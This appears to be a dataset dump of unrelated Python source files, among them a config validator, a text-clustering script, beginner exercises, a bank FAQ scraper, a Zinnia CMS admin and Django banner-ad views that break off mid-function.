e\n \n def _validate_cfg(self, cfg: dict):\n self._validate_cfg_value('max_users', cfg.get('max_users'))\n self._validate_cfg_value('max_posts', cfg.get('max_posts'))\n self._validate_cfg_value('max_likes', cfg.get('max_likes'))\n\n \n def _validate_cfg_value(self, param_name: str, value):\n if value is None:\n raise ConfigValidationError(f'{param_name} is None')\n if type(value) != int:\n raise ConfigValidationError(f'{param_name} must be type of {int}, got {type(value)}')\n if value < 0:\n raise 
ConfigValidationError(f'{param_name} must be >= 0, got {value}')\n\n def _init_from_cfg(self, cfg: dict):\n self.max_users = cfg['max_users']\n self.max_posts = cfg['max_posts']\n self.max_likes = cfg['max_likes']\n \n def __str__(self):\n return f'configuration:\\nmax_users: {self.max_users}\\nmax_posts: {self.max_posts}\\n' + \\\n f'max_likes: {self.max_likes}'\n\n\nclass ConfigValidationError(Exception):\n pass","sub_path":"bot/bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3232078","text":"from sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import DBSCAN\nimport numpy as np\nimport re\nimport pandas as pd\nfrom torch import nn,functional as F\nimport torch\n\nclass Setlabel:\n def clearData(self):\n datas=pd.read_csv('datas.csv')\n filter_pattern = re.compile('[^\\u4e00-\\u9fa5,。.,?!;;::a-zA-Z0-9]+$')\n filter_pattern1=re.compile('<.*>')\n for i,value in enumerate(datas['评论']):\n datas['评论'][i]=filter_pattern1.sub('',datas['评论'][i])\n datas['评论'][i] = filter_pattern.sub('', datas['评论'][i])\n if len(datas['评论'][i])<2:\n datas=datas.drop(i)\n datas=datas.drop_duplicates(['评论'],keep='first',)\n datas.to_csv('Cdatas1.csv',index=False)\n\n def kms(self,datas):#kms聚类\n Scores=[]\n for k in range(5,11):\n KMS=KMeans(n_clusters=k)\n KMS.fit(datas)\n Scores.append(silhouette_score(datas,KMS.labels_,metric='euclidean'))\n plt.xlabel('k')\n plt.ylabel('轮廓系数')\n plt.plot(range(2,9),Scores,'o-')\n plt.imsave('picture/BestK.jpg')\n def dbs(self):#dbscan聚类\n datas=pd.read_csv('Cdatas1.csv')\n embed=nn.Embedding(10000,100)\n datas=embed(torch.Tensor([datas['评论']]))\n print(datas)\n # db=DBSCAN(eps=10,min_samples=30)\n # db.fit(datas)\n # labels=db.labels_\n # datas['labels']=labels\n # datas.groupby('labels').count()\n\n def plotFeature(data, clusters, clusterNum):\n nPoints = data.shape[1] #label\n matClusters = np.mat(clusters).transpose()\n fig = plt.figure()\n scatterColors = ['turquoise','violet','quartz','cadetblue','coral','darkmagenta','black', 'blue', 'green', 'yellow', 'red', 'purple', 'orange', 'brown'][:clusterNum]\n ax = fig.add_subplot(111)\n for i in range(clusterNum + 1):\n colorSytle = scatterColors[i % len(scatterColors)]\n subCluster = data[:, np.nonzero(matClusters[:, 0].A == i)]\n ax.scatter(subCluster[0, :].flatten().A[0], subCluster[1, :].flatten().A[0], c=colorSytle, s=50)\n plt.imsave('picture/分类效果图.jpg')\n def worldembedding(self):\n torch\n def setlabe(self):\n datas=pd.read_csv('trainSet.csv',sep='\\t')\n for v,i in enumerate(datas.iterrows()):\n if v%10==0:\n print(datas.columns.values)\n print(datas['text_a'][v])\n while True:\n try:\n datas.iloc[v, 2:]=list(input())\n except Exception as e:\n print(\"输入有误\")\n continue\n else:\n break\n datas.to_csv('trainSet.csv',sep='\\t',index=False)\n def ran(self):\n datas=pd.read_csv('trainSet.csv',sep='\\t')\n import random\n datas['难过']=np.random.randint(0,2,datas.shape[0])\n datas['开心']=np.random.randint(0,2,datas.shape[0])\n datas['赞赏']=np.random.randint(0,2,datas.shape[0])\n datas['批评']=np.random.randint(0,2,datas.shape[0])\n datas['怀疑']=np.random.randint(0,2,datas.shape[0])\n datas['喜欢']=np.random.randint(0,2,datas.shape[0])\n datas['惊叹']=np.random.randint(0,2,datas.shape[0])\n datas['鼓励']=np.random.randint(0,2,datas.shape[0])\n print(datas['text_a'])\n datas.to_csv('trainSet.csv', sep='\\t', 
index=False)\n\n#\n# dataset=Setlabel()\n# # dataset.clearData()\n# dataset.ran()\ndef CD2():\n    datas=pd.read_csv('datase.csv')\n    datas.rename(columns={'评论':'text_a'},inplace=True)\n    datas.to_csv('Cdatas.csv',index=False)\ndef splitSet():\n    datas = pd.read_csv('enddatas.csv',sep='\\t')\n\n    from sklearn.utils import shuffle\n    datas = shuffle(datas)\n    trainSet=datas.iloc[:-1100,:]\n    testSet=datas.iloc[-1100:-550,:]\n    devSet=datas.iloc[-550:-100,:]\n    preSet=datas.iloc[:-100,:0]\n    trainSet.to_csv('trainSet.csv',index=False,sep='\\t')\n    devSet.to_csv('devSet.csv',index=False,sep='\\t')\n    testSet.to_csv('testSet.csv',index=False,sep='\\t')\n    preSet.to_csv('preSet.csv',index=False,sep='\\t')\n# splitSet()\n\n","sub_path":"setlebal.py","file_name":"setlebal.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"104837091","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/3/9 0009\n# @Author : yang\n# @Email : 2635681517@qq.com\n# @File : 49.py\n\"\"\"Compute the length of a string.\"\"\"\n\n\ndef leng(string1):\n    count = 0\n    for _ in string1:\n        count = count + 1\n    return count\n\n\ndef leng1(string1):\n    rest = 0\n    for i in range(1, leng(string1) + 1):\n        rest = rest + 1\n    print(rest)\n\n\nstring1 = 'yang '\nprint(len(string1))\nif __name__ == \"__main__\":\n    string1 = 'yang '\n    # leng(string1)\n    leng1(string1)\n","sub_path":"Interview/5/49.py","file_name":"49.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"542234956","text":"\"\"\"\nPlots output of experimental results file\n\"\"\"\nimport context\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\n\ndef graph(args):\n    means = {}\n    std = {}\n    labels = []\n    for fname in args.data:\n        with open(fname, 'r') as f:\n            results = json.load(f)\n        for i,graph in enumerate(results):\n            if graph != 'graph 1': continue\n            if graph=='time':continue\n            data = results[graph]\n            if args.use_baseline:\n                for k in data:\n                    if k == 'baseline': continue\n                    for i in range(len(data[k])):\n                        data[k][i] -= data['baseline'][i]\n            for k in data:\n                if k == 'baseline': continue\n                if 
k in args.skip: continue\n # for j in range(len(data[k])):\n # data[k][j] *= -1\n # if len(results) > 1:\n # axs = ax[i]\n # else:\n # axs = ax\n # avg = {k:sum(data[k])/len(data[k]) for k in data}\n # err_pos = {}\n # err_neg = {}\n # for k in data:\n # if k == 'baseline':\n # continue\n # if k in args.skip:\n # continue\n # err_p = []\n # err_n = []\n # mu = avg[k]\n # for p in data[k]:\n # if p > mu:\n # err_p.append(p - mu)\n # else:\n # err_n.append(mu - p)\n # if len(err_p): \n # err_pos[k] = sum(err_p) / len(err_p)\n # else:\n # err_pos[k] = 0\n\n # if len(err_n):\n # err_neg[k] = sum(err_n) / len(err_n)\n # else:\n # err_neg[k] = 0\n\n # worst_case = {k:max(data[k]) for k in data}\n # \n # labels = list(k for k in data.keys() if k != 'baseline' and k not in args.skip)\n\n # positions = list(range(len(labels)))\n\n # axs.errorbar(positions, [worst_case[labels[i]] for i in positions], fmt='ro')\n # axs.errorbar(positions, [avg[labels[i]] for i in positions],\n # [[err_neg[labels[i]] for i in positions], [err_pos[labels[i]] for i in positions]], fmt='o')\n # axs.set_xticks(positions)\n # axs.set_xticklabels(labels)\n #if args.output:\n # plt.savefig(args.output)\n #else:\n # plt.show()\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('data', nargs='+', default=['results.json'], help='datafile to graph')\n parser.add_argument('--use_baseline', action='store_true', help='Flag should be present if baseline is subtracted from results')\n parser.add_argument('--skip', default = [], nargs='+', help='labels to skip graphing')\n parser.add_argument('--x_vals', nargs='+', type=float, help='x-axis values per results file')\n parser.add_argument('-o', '--output', help='output file')\n parser.add_argument('--x_axis', help=\"x-axis label\")\n parser.add_argument('--y_axis', help=\"y-axis label\")\n parser.add_argument('--labels', nargs='+', help='legend labels')\n parser.add_argument('--title', help='Figure Title')\n parser.add_argument(\"--y_lims\", nargs=2, type=float, help=\"Y-axis limits\")\n args = parser.parse_args()\n graph(args)\n\n\n\n\n","sub_path":"graphing/plot_results2.py","file_name":"plot_results2.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427244827","text":"# Copyright (c) 2022 Graphcore Ltd. 
All rights reserved.\nimport popxl\nimport popxl.ops as ops\nimport numpy as np\nimport torch\n\n\nclass TestCos:\n def test_cos(self):\n input_data = np.random.rand(10, 20).astype(\"float32\")\n ir = popxl.Ir()\n main = ir.main_graph\n\n with main:\n t = popxl.constant(input_data, popxl.float32, name=\"input_0\")\n o = ops.cos(t)\n # host store\n o_d2h = popxl.d2h_stream(o.shape, o.dtype, name=\"out_stream\")\n ops.host_store(o_d2h, o)\n\n # get the result\n with popxl.Session(ir, \"ipu_model\") as session:\n outputs = session.run()\n\n # cos in torch\n torch_t = torch.tensor(input_data).type(torch.float32)\n torch_outputs = torch_t.cos()\n\n # compare the result between PopXL and torch\n np.testing.assert_allclose(\n torch_outputs.detach().numpy(),\n list(outputs.values())[0],\n rtol=1e-6,\n atol=1e-6,\n )\n","sub_path":"tests/integration/popxl/test_cos.py","file_name":"test_cos.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249859910","text":"import os\nimport logging\nimport logging.config\nimport logging.handlers\nimport yaml\n\n\nclass Config:\n MONGO_URI = os.environ.get(\"MONGO_URI\") or \"mongodb://localhost:27017/myDatabase\"\n # Change this secret key in production\n SECRET_KEY = os.environ.get(\"SECRET_KEY\") or \"IO7i69COm4xQhstA\"\n TESTING = False\n\n\ndef setup_logging(\n default_path=\"logging.yaml\", default_level=logging.INFO, env_key=\"LOG_CFG\"\n):\n \"\"\"Setup logging configuration\n\n \"\"\"\n path = default_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n with open(path, \"rt\") as f:\n config = yaml.safe_load(f.read())\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167347514","text":"from turtle import *\nimport random\n\nmouse = Turtle()\nmouse.ht()\nmouse.pu()\nc=getcanvas()\nCANVAS_WIDTH = c.winfo_width()\nCANVAS_HEIGHT = c.winfo_height()\n\nclass Cell(Turtle):\n\tdef __init__(self,r,x,y,dx,dy,color='black'):\n\t\tTurtle.__init__(self)\n\t\tself.penup()\n\t\tself.color(\"blue\",color)\n\t\tself.goto(x,y)\n\t\tself.r = r\n\t\tself.dx = dx\n\t\tself.dy = dy\n\t\tself.shape(\"circle\")\n\t\tself.ht()\n\tdef get_radius(self):\n\t\treturn self.r\n\tdef get_dx(self):\n\t\treturn self.dx\n\tdef get_dy(self):\n\t\treturn self.dy\n\tdef set_radius(self,r):\n\t\tif(r<100):\n\t\t\tself.r = r\n\tdef set_dx(self,dx):\n\t\tself.dx = dx\n\tdef set_dy(self,dy):\n\t\tself.dy = dy\n\tdef get_speed(self):\n\t\treturn 150 / (self.r)\n\n\n\ndef create_cell(cell):\n\tgetscreen().tracer(0)\n\tif ('color' in cell.keys()):\n\t\tc = Cell(cell['radius'],cell['x'],cell['y'],cell['dx'],cell['dy'],cell['color'])\n\telse:\n\t\tc = Cell(cell['radius'],cell['x'],cell['y'],cell['dx'],cell['dy'])\n\treturn c\n\ndef move_cell(c):\n\tx = c.xcor()\n\tdx = c.get_dx()\n\ty = c.ycor()\n\tdy = c.get_dy()\n\tr = c.get_radius()\n\tc.goto(x+dx,y+dy-r)\n\tc.begin_fill()\n\tc.pd()\n\tc.circle(c.get_radius())\n\tc.pu()\n\tc.end_fill()\n\tx = c.xcor()\n\tdx = c.get_dx()\n\ty = c.ycor()\n\tdy = c.get_dy()\n\tr = c.get_radius()\n\tc.goto(x+dx,y+dy+r)\n\ndef move_cells(cells):\n\tht()\n\tfor c in cells:\n\t\tc.clear()\n\t\tmove_cell(c)\n\tgetscreen().update()\n\ndef create_screen(width, 
height):\n\tgetscreen().screensize(width,height)\n\ndef get_screen_width():\n\tglobal CANVAS_WIDTH\n\treturn CANVAS_WIDTH/2-10\n\ndef get_screen_height():\n\tglobal CANVAS_HEIGHT\n\treturn CANVAS_HEIGHT/2-5\n\ndef get_x_mouse():\n\tglobal mouse\n\treturn mouse.xcor()\n\ndef get_y_mouse():\n\tglobal mouse\n\treturn mouse.ycor()\n\ndef movearound(event):\n\tglobal CANVAS_WIDTH\n\tglobal CANVAS_HEIGHT\n\tmouse.goto(event.x-c.winfo_width()/2,c.winfo_height()/2-event.y)\n\tif(CANVAS_WIDTH != c.winfo_width() or CANVAS_HEIGHT != c.winfo_height()):\n\t\tgetscreen().screensize(c.winfo_width()/2,c.winfo_height()/2)\n\t\tCANVAS_WIDTH = c.winfo_width()\n\t\tCANVAS_HEIGHT = c.winfo_height()\n\ndef get_user_direction(cell):\n\tmouse_x = get_x_mouse()\n\tmouse_y = get_y_mouse()\n\n\tuser_speed = cell.get_speed()\n\tdistance = ((mouse_x - cell.xcor() )**2 + (mouse_y - cell.ycor())**2)**0.5\n\n\tif abs(mouse_x - cell.xcor()) < cell.get_radius():\n\t\txdir = 0\n\telse:\n\t\txdir = int(user_speed * (mouse_x - cell.xcor()) / distance)\n\n\tif abs(mouse_y - cell.ycor()) < cell.get_radius():\n\t\tydir = 0\n\telse:\n\t\tydir = int(user_speed * (mouse_y - cell.ycor()) / distance)\n\n\treturn (xdir, ydir)\n\ndef get_random_x():\n\treturn random.randint(-get_screen_width(), get_screen_width())\ndef get_random_y():\n\treturn random.randint(-get_screen_height(), get_screen_height())\n\nc.bind(\"<Motion>\", movearound)\ngetscreen().listen()","sub_path":"meet.py","file_name":"meet.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"517438257","text":"\"\"\"\nEXERCISE 030: Even or Odd?\nWrite a program that reads an integer and shows on screen whether it is EVEN or ODD.\n\"\"\"\n\nn = int(input('Enter a number: '))\nr = n % 2\nif r == 0:\n    print('The number {} is even.'.format(n))\nelse:\n    print('The number {} is odd.'.format(n))","sub_path":"Exercícios Python/ex030_Par ou impar.py","file_name":"ex030_Par ou impar.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"325304721","text":"def fibo(n):\n    if n <= 1:\n        return n\n    else:\n        return (fibo(n-1) + fibo(n-2))\n\n\nn = int(input(\"Enter a positive number: \"))\n\nif n < 0:\n    print(\"You entered a negative number\")\nelse:\n    print(\"Fibonacci sequence:\")\n    for i in range(n):\n        # print(i)\n        print(fibo(i))\n","sub_path":"python_lynda/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"346634427","text":"__author__ = \"ALEX-CHUN-YU (P76064538@mail.ncku.edu.tw)\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport os\n\n# CTBC credit card QA crawler\nclass Crawler:\n\t\n\tdef __init__(self):\n\t\tself.session = requests.session()\n\t\tself.root = 'https://www.ctbcbank.com/CTCBPortalWeb/appmanager/ebank/rb?_nfpb=true&_pageLabel=TW_RB_CM_service_000007&_windowLabel=T24004047331358757232751&_nffvid=%2FCTCBPortalWeb%2Fpages%2FcallCenter%2FcallCenterIntro.faces&firstView=true'\n\n\tdef crawl(self):\n\t\tqa = {}\n\t\tqa_list = []\n\t\tq = self.get_question()\n\t\ta = self.get_answer()\n\t\tfor i in range(len(q)):\n\t\t\tqa['question'] = q[i]\n\t\t\tqa['answer'] = a[i]\n\t\t\tqa_list.append(qa.copy())\n\t\tself.ouput_board_page_articles_json(qa_list)\n\t\t#print(qa_list)\n\n\tdef get_question(self):\n\t\tquestion = []\n\t\ttry:\n\t\t\t#request url\n\t\t\tres = 
self.session.get(self.root)\n\t\t\t#successful request\n\t\t\tif res.status_code == 200:\n\t\t\t\tsoup = BeautifulSoup(res.text, \"html.parser\")\n\t\t\t\tfor q in soup.select(\".greenlink1-2\"):\n\t\t\t\t\tquestion.append(q.text.strip('\\n').strip(' ').strip('\\t').strip(' \\n').strip('Q:'))\n\t\t\treturn question\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\tdef get_answer(self):\n\t\tanswer = []\n\t\ttry:\n\t\t\t#request url\n\t\t\tres = self.session.get(self.root)\n\t\t\t#successful request\n\t\t\tsoup = BeautifulSoup(res.text, \"html.parser\")\n\t\t\t#print(soup)\n\t\t\tfor a in soup.select(\".eventgraybox02\"):\n\t\t\t\t#print('answer ' + a.text)\n\t\t\t\tanswer.append(a.text.strip('\\n').strip(' ').strip('\\t').strip(' \\n').strip('A:'))\n\t\t\treturn answer\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\t#輸出JSON格式\n\tdef ouput_board_page_articles_json(self, res = None):\n\t\tif not os.path.exists(\"CTBC_Crawl_Result\"):\n\t\t\tos.makedirs(\"CTBC_Crawl_Result\")\n\t\twith open(\"CTBC_Crawl_Result/\" + 'CTBC2' + \".json\" , 'wb') as f:\n\t\t\tf.write(json.dumps(res, indent = 4, ensure_ascii = False).encode('utf-8'))","sub_path":"CTBC_ChatbotTest/CTBC_QA_Crawler/CTBC_Crawler2.py","file_name":"CTBC_Crawler2.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121019276","text":"\"\"\"Admin of Zinnia CMS Plugins\"\"\"\nfrom django.contrib import admin\nfrom django.template import RequestContext\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom cms.plugin_rendering import render_placeholder\nfrom cms.admin.placeholderadmin import PlaceholderAdmin\n#dm\nfrom cms.plugins.utils import get_plugins\nfrom cms.plugin_rendering import render_plugins\nfrom cms.utils.django_load import iterload_objects\n\nfrom zinnia.models.entry import Entry\nfrom zinnia.admin.entry import EntryAdmin\nfrom zinnia.settings import ENTRY_BASE_MODEL\n\n\nclass EntryPlaceholderAdmin(PlaceholderAdmin, EntryAdmin):\n \"\"\"EntryPlaceholder Admin\"\"\"\n fieldsets = ((None, {'fields': ('title', 'image', ('status','page_link'))}),\n (_('Dates'), {'fields': ( ('event_timedate', 'end_publication'),\n ('start_publication', 'creation_date'),\n ),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Content'), {'fields': ('content_placeholder',),\n 'classes': ('plugin-holder',\n 'plugin-holder-nopage')}),\n (_('Content Original'), {'fields': ('content',),\n #'classes': ('collapse', 'collapse-open')\n }),\n (_('Options'), {'fields': ( 'featured',\n 'excerpt', 'template',\n 'related', 'authors',\n# 'creation_date',\n# ('start_publication','end_publication')\n ),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Privacy'), {'fields': ('password', 'login_required',),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Discussion'), {'fields': ('comment_enabled',\n 'pingback_enabled'),\n 'classes': ('collapse', 'collapse-closed')}),\n (_('Publication'), {'fields': ('sites', 'categories',\n 'tags', 'slug')}))\n\n def save_model(self, request, entry, form, change):\n \"\"\"Fill the content field with the interpretation\n of the placeholder\"\"\"\n context = RequestContext(request)\n #dm\n processors = iterload_objects(settings.CMS_PLUGIN_PROCESSORS)\n plugins = [plugin for plugin in get_plugins(request, entry.content_placeholder)]\n render = render_plugins(plugins, context, entry.content_placeholder)\n content = \"\".join(render)\n entry.placeholder_render = content\n #entry.placeholder_render = 
render_placeholder(entry.content_placeholder, context )\n #entry.content = render_placeholder(entry.content_placeholder, context)\n entry.save()\n super(EntryPlaceholderAdmin, self).save_model(\n request, entry, form, change)\n\n save_on_top = True\n #media = property(EntryAdmin.media)\n\nif ENTRY_BASE_MODEL == 'cmsplugin_zinnia.placeholder.EntryPlaceholder':\n admin.site.unregister(Entry)\n admin.site.register(Entry, EntryPlaceholderAdmin)\n","sub_path":"cmsplugin_zinnia/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"654345312","text":"'''\nCreated on Aug 5, 2019\n\n@author: DCahall\n'''\nimport tensorflow as tf\nimport numpy as np\nfrom DifferentiableArgmaxApproximation.DifferentiableArgmaxApproximation import DifferentiableArgmaxApproximation\n\n\ndef main():\n sess = tf.Session()\n x = tf.placeholder(dtype=tf.float64, shape=(None,))\n \n beta = 100\n y = DifferentiableArgmaxApproximation(x, beta)\n \n print(\"I can compute the gradient\", tf.gradients(y, x))\n \n ## Compare the actual argmax to the approximation\n ## Should be fairly close (assuming there is one unique argmax)\n for _ in range(10):\n data = np.random.randn(10)\n print(data.argmax(), sess.run(y, feed_dict={x:data/np.linalg.norm(data)}))\n \nif __name__==\"__main__\":\n main()\n exit()\n ","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84345332","text":"import time\n\nfrom sensor import Sensor\nfrom claw import Claw\n# noinspection PyUnresolvedReferences\nfrom sr.robot import Robot\n\n\ndef main():\n claw = Claw(Robot())\n sensors = [Sensor(\"Front\", 4), Sensor(\"BackRight\", 1), Sensor(\"BackLeft\", 3),\n Sensor(\"Back\", 2)]\n\n claw.close()\n\n while True:\n for sensor in sensors:\n sensor.get_distance()\n\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Tests/sensor_test.py","file_name":"sensor_test.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"325394825","text":"import time\n\n\ndef countdown(func):\n def return_time():\n num = 3\n while num:\n print(num)\n time.sleep(1)\n num -= 1\n result = func()\n return result\n return return_time\n\n\n@countdown\ndef what_time_is_it_now() -> str:\n return time.strftime('%H:%M')\n\n\nprint(what_time_is_it_now())\n","sub_path":"homework_06/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555278867","text":"from django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import DetailView, CreateView, UpdateView, ListView, View, TemplateView\nfrom django.views.generic.base import RedirectView\nfrom .models import Banner, BannerStats, Profile\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nfrom datetime import datetime\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import HttpResponse\nimport json\nimport urllib2\n\n\n# Define Banners CRUD\n\nclass BannersList(ListView):\n\n\ttemplate_name = 'banners/banners.html'\n\tcontext_object_name = 'banners'\n\n\tdef get_queryset(self):\n\t\treturn 
Banner.objects.select_related('clientid').filter(clientid=self.request.user)\n\n# select_related allows to decrease the amount of sql queries\n# when it comes to session queries, redis cache for django is an option to look into\n\nclass BannerStatsDetail(DetailView):\n\n\ttemplate_name = 'banners/banner_stats.html'\n\tcontext_object_name = 'banner_stats'\n\n\tdef get_queryset(self, **kwargs):\n\t\tbannerid = self.kwargs['pk']\n\t\treturn BannerStats.objects.filter(banner=bannerid)\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(BannerStatsDetail, self).get_context_data(**kwargs)\n\t\tcontext['impressions'] = kwargs['banner_stats']\n\t\treturn context\n\n\nclass CreateBanner(CreateView):\n\n\tmodel = Banner\n\tfields = [\n\t\t'title', 'type', 'description',\n\t\t'custom_text', 'status', 'priority',\n\t\t'start_date', 'end_date', 'image', 'redirect_url'\n\t]\n\ttemplate_name = \"banners/banner_edit.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse('banners')\n\n\tdef form_valid(self, form):\n\t\tform.instance.clientid = self.request.user\n\t\treturn super(CreateBanner, self).form_valid(form)\n\n\nclass BannerUpdate(UpdateView):\n\n\tmodel = Banner\n\ttemplate_name = 'banners/banner_edit.html'\n\tfields = [\n\t\t'title', 'type', 'description',\n\t\t'custom_text', 'status', 'priority',\n\t\t'start_date', 'end_date', 'image', 'redirect_url'\n\t]\n\tsuccess_url = \"/banners/\"\n\n\tdef get_queryset(self):\n\t\tbase_qs = super(BannerUpdate, self).get_queryset()\n\t\treturn base_qs.filter(clientid=self.request.user)\n\n\n# User Profile View\n\nclass UserProfile(UpdateView):\n\tmodel = Profile\n\ttemplate_name = 'auth/profile.html'\n\tfields = [\n\t\t'brand_name', 'company_logo', 'background_logo'\n\t]\n\tsuccess_url = \"/account/profile\"\n\n\tdef get_object(self):\n\t\tprofile_object = Profile.objects.get(user=self.request.user)\t\n\t\treturn profile_object\n\n\n# Define Front end for banners\t\n\nclass DefaultBanner(TemplateView):\n\n\ttemplate_name = 'front/default.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\t# Call the base implementation first to get a context\n\t\tcontext = super(DefaultBanner, self).get_context_data(**kwargs)\n\t\t# Add in a QuerySet of all the books\n\t\tclient_name = self.kwargs.get('client')\n\t\t# Match the username to the id to pass for a banner\n\t\tuserid = get_object_or_404(User, username=client_name)\n\t\tcontext['profile'] = get_object_or_404(Profile, user=userid)\n\t\tcontext['mac'] = self.request.GET.get('mac')\n\t\treturn context\n\n# Define default clicks web banner\n\nclass ClicksWebBanner(TemplateView):\n\n\ttemplate_name = 'front/clicks.html'\n\tactive_banner = BannerStats()\n\n\t# function to get the active banner\n\tdef get_active_banner(self, userid):\n\n\t\tself.active_banner = Banner.objects.filter(clientid=userid).filter(status=True).filter(\n\t\t\t\tstart_date__lte=datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\tend_date__gte=datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),)[0]\n\n\t\n\t# Function to get the client ip\n\tdef get_client_ip(self):\n\t\tip = self.request.META.get(\"HTTP_X_FORWARDED_FOR\", None)\n\t\tif ip:\n\t\t\tip = ip.split(\", \")[0]\n\t\telse:\n\t\t\tip = self.request.META.get(\"REMOTE_ADDR\", \"\")\n\t\treturn ip\n\n\n\tdef get_device_type(self):\n\t\treturn self.request.user_agent.device.family\n\n\tdef get_os_type(self):\n\t\treturn self.request.user_agent.os.family\n\n\tdef get_browser_type(self):\n\t\treturn self.request.user_agent.browser.family\n\n\tdef get_mac_address(self):\n\t\tif 
self.request.GET:\n\t\t\tmac = self.request.GET.get('mac')\n\t\telse:\n\t\t\tmac = 'None'\n\t\treturn mac\n\n\n\t# Main function to track the banner stats\n\tdef tracking_banner_stat(self):\n\t\ttry:\n\t\t\tBannerStats.objects.get(session=self.request.session.session_key)\n\t\texcept ObjectDoesNotExist:\n\t\t\t# import socket\n\t\t\t# dns = str(socket.getfqdn(self.get_client_ip())).split('.')[-1]\n\t\t\t# put if int(dns) after try, else: pass\n\t\t\ttry:\n\t\t\t\tif not self.request.session.session_key:\n\t\t\t\t\tself.request.session.save()\n\t\t\t\tstat = BannerStats(banner=self.active_banner,\n\t\t\t\t\t\t\t\t\tip=self.get_client_ip(),\n\t\t\t\t\t\t\t\t\tmac = self.get_mac_address(),\n\t\t\t\t\t\t\t\t\tclicks = 0,\n\t\t\t\t\t\t\t\t\timpressions = 1,\n\t\t\t\t\t\t\t\t\tdate = datetime.now(),\n\t\t\t\t\t\t\t\t\tdevice_type = self.get_device_type(),\n\t\t\t\t\t\t\t\t\tos_type = self.get_os_type(),\n\t\t\t\t\t\t\t\t\tbrowser_type = self.get_browser_type(),\n\t\t\t\t\t\t\t\t\tsession=self.request.session.session_key)\n\t\t\t\tstat.save()\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(ClicksWebBanner, self).get_context_data(**kwargs)\n\t\tclient_name = self.kwargs.get('client')\n\t\tuserid = get_object_or_404(User, username=client_name)\n\t\tactive_banner = self.get_active_banner(userid)\n\t\tcontext['profile'] = get_object_or_404(Profile, user=userid)\n\t\tcontext['banner'] = self.active_banner\n\t\tcontext['tracking_banner_stat'] = self.tracking_banner_stat()\n\n\t\treturn context\n\n\n# Authorize and redirect to the desired url\n\nclass AuthorizeRedirect(RedirectView):\n\n\tpermanent = False\n\tquery_string = False\n\tpattern_name = 'authorize-redirect'\n\n\tdef get_redirect_url(self, *args, **kwargs):\n\t\tself.url = 'https://www.google.com'\n\t\treturn super(AuthorizeRedirect, self).get_redirect_url(*args, **kwargs)\n\n\nclass HotspotLogin(TemplateView):\n\n\ttemplate_name = 'front/login.html'\n\n\n# class HotspotAuth(TemplateView):\n\n#\tdef hotspot_auth(request):\n#\t\tif request.method == 'POST':\n\ndef router_auth(request):\n\tif request.method == 'POST':\n\t\tclient_name = request.POST.get('client')\n\t\tuserid = get_object_or_404(User, username=client_name)\n\t\tprofile = get_object_or_404(Profile, user=userid)\n\t\trouter_username = profile.router_username\n\t\trouter_pass = profile.router_pass\n\t\trouter_address = 'http://172.16.16.1/login'\n\n\t\tresponse_data = {\n\t\t\t'username': router_username,\n\t\t\t'password': 